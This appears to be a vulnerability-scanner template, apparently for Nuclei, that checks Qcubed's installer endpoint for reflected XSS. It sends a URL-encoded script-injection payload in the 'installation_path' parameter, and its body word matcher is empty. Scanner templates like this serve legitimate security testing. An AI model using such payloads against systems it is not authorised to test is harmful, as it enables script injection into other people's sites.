id: qcubed-xss info: name: Qcubed Reflected XSS author: pikpikcu severity: medium description: A vulnerability in Qcubed allows remote attackers to inject arbitrary Javascript via the '/assets/php/_devtools/installer/step_2.php' endpoint and the 'installation_path' parameter. reference: - https://github.com/qcubed/qcubed/issues/1230 tags: xss,qcubed requests: - method: GET path: - "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" stop-at-first-match: true matchers-condition: and matchers: - type: word words: - '' part: body - type: status status: - 200 - type: word part: header words: - text/html